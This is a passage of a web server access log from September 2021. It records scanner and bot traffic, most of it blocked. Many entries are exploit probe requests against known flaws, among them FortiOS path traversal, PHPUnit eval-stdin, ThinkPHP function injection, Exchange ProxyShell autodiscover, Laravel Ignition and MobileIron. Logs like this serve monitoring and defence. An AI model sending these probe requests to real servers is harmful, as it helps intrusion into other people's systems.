[20/Sep/2021:02:29:43 +0000] 400 - - http localhost "-" [Client 172.104.131.24] [Length 154] [Gzip -] "-" "-" [20/Sep/2021:03:30:27 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.215.173] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Sep/2021:05:34:44 +0000] 400 - - http localhost "-" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [20/Sep/2021:05:46:20 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 107.189.31.252] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [20/Sep/2021:05:47:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [20/Sep/2021:06:34:48 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [20/Sep/2021:06:43:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.84.139.161] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [20/Sep/2021:07:45:26 +0000] 400 - GET http 64.22.31.253 "/" [Client 120.76.126.209] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Sep/2021:07:49:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Sep/2021:07:58:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.57.29] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-" [20/Sep/2021:07:58:08 +0000] 400 - GET http clientapi.ipip.net "/echo.php?info=20210920155729" [Client 103.203.57.29] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64)" "-" [20/Sep/2021:08:05:57 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.207.137] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Sep/2021:08:51:07 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 91.132.58.33] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.36.2.el7.x86_64" "-" [20/Sep/2021:09:59:23 +0000] 444 - POST https 64.22.31.253 "/pages/createpage-entervariables.action?SpaceKey=x" [Client 217.112.83.246] [Length 0] [Gzip -] "python-requests/2.18.4" "-" [20/Sep/2021:10:10:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Sep/2021:11:45:48 +0000] 400 - - http localhost "-" [Client 45.146.164.210] [Length 154] [Gzip -] "-" "-" [20/Sep/2021:11:45:48 +0000] 400 - - http localhost "-" [Client 45.146.164.210] [Length 154] [Gzip -] "-" "-" [20/Sep/2021:13:11:13 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [20/Sep/2021:13:34:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.89.5.20] [Length 0] [Gzip -] "-" "-" [20/Sep/2021:14:09:46 +0000] 400 - GET http localhost "/" [Client 80.82.70.228] [Length 252] [Gzip -] "Roku/DVP-4.1 (024.01E01250A)" "-" [20/Sep/2021:14:09:57 +0000] 400 - GET http 64.22.31.253 "/" [Client 5.8.10.202] [Length 252] [Gzip -] "fasthttp" "-" [20/Sep/2021:14:09:57 +0000] 444 - GET https 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [20/Sep/2021:14:09:57 +0000] 400 - GET http 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [20/Sep/2021:14:09:58 +0000] 444 - GET https 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [20/Sep/2021:14:09:58 +0000] 400 - GET http 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [20/Sep/2021:14:10:06 +0000] 444 - GET https 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [20/Sep/2021:14:10:06 +0000] 400 - GET http 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [20/Sep/2021:14:10:07 +0000] 444 - GET https 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [20/Sep/2021:14:10:07 +0000] 400 - GET http 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [20/Sep/2021:15:51:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Sep/2021:16:12:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.232.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" "-" [20/Sep/2021:17:02:09 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Sep/2021:17:02:09 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Sep/2021:17:02:09 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Sep/2021:17:02:09 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Sep/2021:17:02:09 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Sep/2021:17:02:09 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Sep/2021:18:46:53 +0000] 444 - GET https 64.22.31.253 "/UI/Dashboard" [Client 92.118.160.13] [Length 0] [Gzip -] "Go http package" "-" [20/Sep/2021:20:26:02 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Sep/2021:20:26:02 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Sep/2021:20:26:04 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Sep/2021:20:26:04 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Sep/2021:20:26:06 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [20/Sep/2021:20:26:07 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Sep/2021:20:26:08 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Sep/2021:20:26:08 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Sep/2021:20:26:10 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Sep/2021:20:26:10 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Sep/2021:20:26:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Sep/2021:20:26:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Sep/2021:21:07:06 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 18.144.81.80] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [20/Sep/2021:21:07:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Sep/2021:21:09:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 66.240.192.82] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Sep/2021:23:37:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.35.168.144] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Sep/2021:23:45:09 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.217.22] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Sep/2021:00:15:29 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.216.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Sep/2021:00:18:34 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 198.199.112.66] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Sep/2021:00:56:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.92] [Length 0] [Gzip -] "-" "-" [21/Sep/2021:01:27:44 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 107.189.31.252] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [21/Sep/2021:02:58:09 +0000] 400 - - http localhost "-" [Client 91.220.163.62] [Length 154] [Gzip -] "-" "-" [21/Sep/2021:03:12:51 +0000] 444 - GET https 64.22.31.253 "/cgi-bin/config.exp" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Sep/2021:04:24:59 +0000] 400 - - http localhost "-" [Client 91.220.163.62] [Length 154] [Gzip -] "-" "-" [21/Sep/2021:04:45:12 +0000] 444 - GET https speedtest.moralanimal.net "/" [Client 34.77.162.2] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [21/Sep/2021:04:55:18 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.212.23] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Sep/2021:05:19:16 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [21/Sep/2021:05:19:16 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [21/Sep/2021:05:22:39 +0000] 400 - GET https localhost "/rgI:" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [21/Sep/2021:06:51:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 182.161.66.103] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36" "-" [21/Sep/2021:06:56:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Sep/2021:07:04:31 +0000] 444 - GET https 139.162.113.11 "/" [Client 194.233.76.241] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0.1) Gecko/20100101 Firefox/61.0.1" "-" [21/Sep/2021:08:10:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.218.109] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Sep/2021:09:11:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 139.59.249.69] [Length 0] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E188a Safari/601.1" "-" [21/Sep/2021:10:15:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.91.94.65] [Length 0] [Gzip -] "Mozilla/5.0" "-" [21/Sep/2021:11:02:04 +0000] 444 - GET https 64.22.31.253 "/autodiscover/autodiscover.json?@evil.corp/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp" [Client 45.155.204.227] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [21/Sep/2021:11:36:04 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Sep/2021:11:36:04 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Sep/2021:11:36:05 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Sep/2021:11:36:06 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Sep/2021:11:36:07 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [21/Sep/2021:11:36:09 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Sep/2021:11:36:11 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Sep/2021:11:36:12 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Sep/2021:11:36:14 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Sep/2021:11:36:15 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Sep/2021:11:36:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Sep/2021:11:36:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Sep/2021:12:13:42 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [21/Sep/2021:12:29:03 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.205.116] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Sep/2021:13:26:43 +0000] 444 - OPTIONS https 64.22.31.253 "/" [Client 34.142.74.177] [Length 0] [Gzip -] "-" "-" [21/Sep/2021:13:40:15 +0000] 444 - GET https 64.22.31.253 "/_asterisk/" [Client 77.247.108.81] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [21/Sep/2021:14:08:02 +0000] 400 - GET http 64.22.31.253 "/admin/config.php" [Client 77.247.108.81] [Length 252] [Gzip -] "python-requests/2.26.0" "-" [21/Sep/2021:14:51:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Sep/2021:15:02:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 139.162.215.70] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Sep/2021:15:59:32 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [21/Sep/2021:17:02:14 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Sep/2021:17:02:14 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Sep/2021:17:02:14 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Sep/2021:17:02:14 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Sep/2021:17:02:14 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Sep/2021:17:02:14 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Sep/2021:17:32:34 +0000] 444 - GET https 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [21/Sep/2021:17:52:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.167.142] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [21/Sep/2021:17:52:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.167.142] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [21/Sep/2021:17:52:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.167.142] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [21/Sep/2021:17:52:16 +0000] 400 - - https localhost "-" [Client 71.6.167.142] [Length 0] [Gzip -] "-" "-" [21/Sep/2021:17:52:16 +0000] 400 - - https localhost "-" [Client 71.6.167.142] [Length 0] [Gzip -] "-" "-" [21/Sep/2021:17:52:17 +0000] 400 - - https localhost "-" [Client 71.6.167.142] [Length 0] [Gzip -] "-" "-" [21/Sep/2021:17:52:20 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 71.6.167.142] [Length 0] [Gzip -] "-" "-" [21/Sep/2021:17:52:21 +0000] 444 - GET https 64.22.31.253 "/sitemap.xml" [Client 71.6.167.142] [Length 0] [Gzip -] "-" "-" [21/Sep/2021:17:52:21 +0000] 444 - GET https 64.22.31.253 "/.well-known/security.txt" [Client 71.6.167.142] [Length 0] [Gzip -] "-" "-" [21/Sep/2021:17:52:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.79.68.246] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [21/Sep/2021:17:59:07 +0000] 400 - - http localhost "-" [Client 194.61.24.78] [Length 154] [Gzip -] "-" "-" [21/Sep/2021:19:08:26 +0000] 444 - GET https 64.22.31.253 "/Telerik.Web.UI.WebResource.axd?type=rau" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Sep/2021:21:01:33 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 107.189.31.252] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [21/Sep/2021:21:27:02 +0000] 400 - - http localhost "-" [Client 137.184.128.208] [Length 154] [Gzip -] "-" "-" [21/Sep/2021:21:27:02 +0000] 400 - GET http localhost "/ab2g" [Client 137.184.128.208] [Length 154] [Gzip -] "-" "-" [21/Sep/2021:21:27:02 +0000] 400 - GET http localhost "/ab2h" [Client 137.184.128.208] [Length 154] [Gzip -] "-" "-" [21/Sep/2021:22:02:51 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [21/Sep/2021:22:14:47 +0000] 444 - GET https 64.22.31.253 "/remote/login" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Sep/2021:22:41:21 +0000] 444 - GET https 64.22.31.253 "/ReportServer" [Client 192.241.220.106] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Sep/2021:23:00:46 +0000] 444 - GET https 64.22.31.253 "/login" [Client 192.241.215.118] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Sep/2021:23:47:29 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.212.72] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Sep/2021:00:07:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.242] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" [22/Sep/2021:00:07:42 +0000] 400 - GET http 64.22.31.253 "/" [Client 128.14.209.242] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" [22/Sep/2021:00:15:57 +0000] 444 - GET https 64.22.31.253 